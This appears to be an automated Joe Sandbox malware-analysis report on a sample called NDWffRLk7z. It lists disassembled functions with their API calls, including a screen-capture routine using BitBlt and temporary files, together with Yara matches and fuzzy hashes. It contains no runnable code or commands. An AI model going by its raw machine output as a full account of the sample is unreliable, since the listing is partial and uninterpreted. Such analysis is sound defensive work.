Function 0043B272 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794

Function 021208BD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410662,0211FE56), ref: 021208C2

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction Fuzzy Hash:

Function 00410656 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
Instruction Fuzzy Hash:

Function 0043BBB1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBB1

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373C9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105

Function 004071A1 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
Opcode Fuzzy Hash: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96

Function 021376DB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction ID: 2d400bd9a061b2effd08bd60b74343980bfc736432898f365581f4c2510006d9
Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction Fuzzy Hash: D0D1D7B22481A34ADB6F4A3D847003AFFF36A421A530E479DE4F7CA5C2EB24D556D660

Function 02137FBE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 0e12d99e565b96c9a416bcb3548ff0ca3c894ed778c0f4eaa59afc35ce11c1c0
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 299141722490A34EEB6F473A847413EFFE25A422A531B079EF4F2CA1C5EF24C565D620

Function 00427D57 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624

Function 02138279 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 3f85db102e37785ab94198dfad28ee703e0bf60001b957d3852abfd758829440
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: EF913E721890A34AEB6B473A857413EFFE35A422A530B079DE4F2CA5C5FF24D164D620

Function 00428012 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624

Function 02137CF7 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 2d472ac657bdbf14d2fe0c8baa2ae0704b59256669a77c55a325e60ed2a9ae61
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: A09185B21490A34EEB6F463A857413EFFE35A421A131A07AEE4F2CE1C5EF14C556D620

Function 00427A90 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624

Function 0213D745 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: bad5bc040b7c4a94f653d33b1a2dad35c9edaee06eecb4319e002d6d533a6b1c
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 02614A716C07046ADF3B5A7CB891BBE63979F41B0CF1408B9D982DB2C0D711E946CB56

Function 0042D4DE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E

Function 02137A4D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: a4b77c9dfa459442c1c13afb5c8cadf1659839b423cba95b8019e5baaeba5fd8
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F88166B22480A34AEB6F463A847457EFFF35A421A530A079DE4F2CA5C5FF14C256D620

Function 004277E6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624

Function 021387B7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 44aebcf89d3c159f449ffa3e7639ba73b4516e5bdda96acabef93d199ddfcb59
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3711EB772C004183D65BCB3DD8B42BBA797EBC5228B2F82FAF0414B758D732A145D600

Function 00428550 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508

Function 0058AD0B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58a000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 2b62c2dc6375225797dd6409bec92dcde7eac9c1632373a72cf8d9defdd89178
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 8511CE72340100AFE704EF55DC81FA677EAFB88360B298466ED08CB716E679EC02C760

Function 02110D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 7475680157ac40bf35106480223050aa579ca0c61c8a9dcb87d03faee0e78f5d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8101F272F516008FDF21CF20C804BAA33E5EB8A206F1540B8DD0A97285E370A8818B80

Function 004020F0 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
GetClientRect.USER32(?,?), ref: 00402140
GetDC.USER32(?), ref: 00402147
CreateSolidBrush.GDI32(00646464), ref: 0040215A
SelectObject.GDI32(00000000,00000000), ref: 0040216E
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
SelectObject.GDI32(00000000,00000000), ref: 00402187
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
SelectObject.GDI32(00000000,00000000), ref: 004021E0
SetBkMode.GDI32(?,00000001), ref: 0040225D
SetTextColor.GDI32(?,00000000), ref: 0040226C
_wcslen.LIBCMT ref: 00402275

Strings

Tahoma, xrefs: 004021B4

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54

Function 00402567 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025C3
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
ReleaseCapture.USER32 ref: 004025E8
GetDC.USER32(00000000), ref: 0040260F
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
CreateCompatibleDC.GDI32(?), ref: 0040269F
SelectObject.GDI32(00000000,00000000), ref: 004026A9
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
ShowWindow.USER32(?,00000000), ref: 004026E0
GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
DeleteFileW.KERNEL32(?), ref: 00402727
DeleteDC.GDI32(00000000), ref: 0040272E
DeleteObject.GDI32(00000000), ref: 00402735
ReleaseDC.USER32(00000000,?), ref: 00402743
DestroyWindow.USER32(?), ref: 0040274A
SetCapture.USER32(?), ref: 00402797
GetDC.USER32(00000000), ref: 004027CB
ReleaseDC.USER32(00000000,00000000), ref: 004027E1
GetKeyState.USER32(0000001B), ref: 004027EE
DestroyWindow.USER32(?), ref: 00402803

Strings

hef, xrefs: 00402701

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: hef
API String ID: 2545303185-98441221
Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C

Function 0213E909 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0213E979
_free.LIBCMT ref: 0213E98F
_free.LIBCMT ref: 0213E9A0
_free.LIBCMT ref: 0213E9B1
_free.LIBCMT ref: 0213E9C8
GetCPInfo.KERNEL32(?,?), ref: 0213EA10

Part of subcall function 02146942: _free.LIBCMT ref: 021469AD

_free.LIBCMT ref: 0213EBBC
_free.LIBCMT ref: 0213EBCF
_free.LIBCMT ref: 0213EBDD
_free.LIBCMT ref: 0213EBE8
_free.LIBCMT ref: 0213EC2A
_free.LIBCMT ref: 0213EC32
_free.LIBCMT ref: 0213EC3A
_free.LIBCMT ref: 0213EC42
_free.LIBCMT ref: 0213EC50

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 8d0cfe77f87e8974ff2cf5b066d120e38d661a556dd51ab7bf6fa589eedfaf7e
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: E5B18F71D403099FDF229F68C880BEEBBF6BF08304F144569E5A9A7251DB75A941CF60

Function 0042E6A2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E712
_free.LIBCMT ref: 0042E728
_free.LIBCMT ref: 0042E739
_free.LIBCMT ref: 0042E74A
_free.LIBCMT ref: 0042E761
GetCPInfo.KERNEL32(?,?), ref: 0042E7A9

Part of subcall function 004366DB: _free.LIBCMT ref: 00436746

_free.LIBCMT ref: 0042E955
_free.LIBCMT ref: 0042E968
_free.LIBCMT ref: 0042E976
_free.LIBCMT ref: 0042E981
_free.LIBCMT ref: 0042E9C3
_free.LIBCMT ref: 0042E9CB
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28

Function 0214A84F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0214A893

Part of subcall function 02149BE2: _free.LIBCMT ref: 02149BFF
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C11
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C23
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C35
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C47
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C59
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C6B
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C7D
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149C8F
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149CA1
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149CB3
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149CC5
Part of subcall function 02149BE2: _free.LIBCMT ref: 02149CD7

_free.LIBCMT ref: 0214A888

Part of subcall function 021436C1: HeapFree.KERNEL32(00000000,00000000,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?), ref: 021436D7
Part of subcall function 021436C1: GetLastError.KERNEL32(?,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?,?), ref: 021436E9

_free.LIBCMT ref: 0214A8AA
_free.LIBCMT ref: 0214A8BF
_free.LIBCMT ref: 0214A8CA
_free.LIBCMT ref: 0214A8EC
_free.LIBCMT ref: 0214A8FF
_free.LIBCMT ref: 0214A90D
_free.LIBCMT ref: 0214A918
_free.LIBCMT ref: 0214A950
_free.LIBCMT ref: 0214A957
_free.LIBCMT ref: 0214A974
_free.LIBCMT ref: 0214A98C

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 4de7ee3ad9ff37b6ead0cc72e640cfe35986dc3ba821c62e4ae1625886ce21b3
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: C6314D32AC0206AFEB21AF38E844B5677E9EF00311F264469E56DD7260DF31A951CFA4

Function 0043A5E8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A62C

Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70

_free.LIBCMT ref: 0043A621

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A643
_free.LIBCMT ref: 0043A658
_free.LIBCMT ref: 0043A663
_free.LIBCMT ref: 0043A685
_free.LIBCMT ref: 0043A698
_free.LIBCMT ref: 0043A6A6
_free.LIBCMT ref: 0043A6B1
_free.LIBCMT ref: 0043A6E9
_free.LIBCMT ref: 0043A6F0
_free.LIBCMT ref: 0043A70D
_free.LIBCMT ref: 0043A725

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19

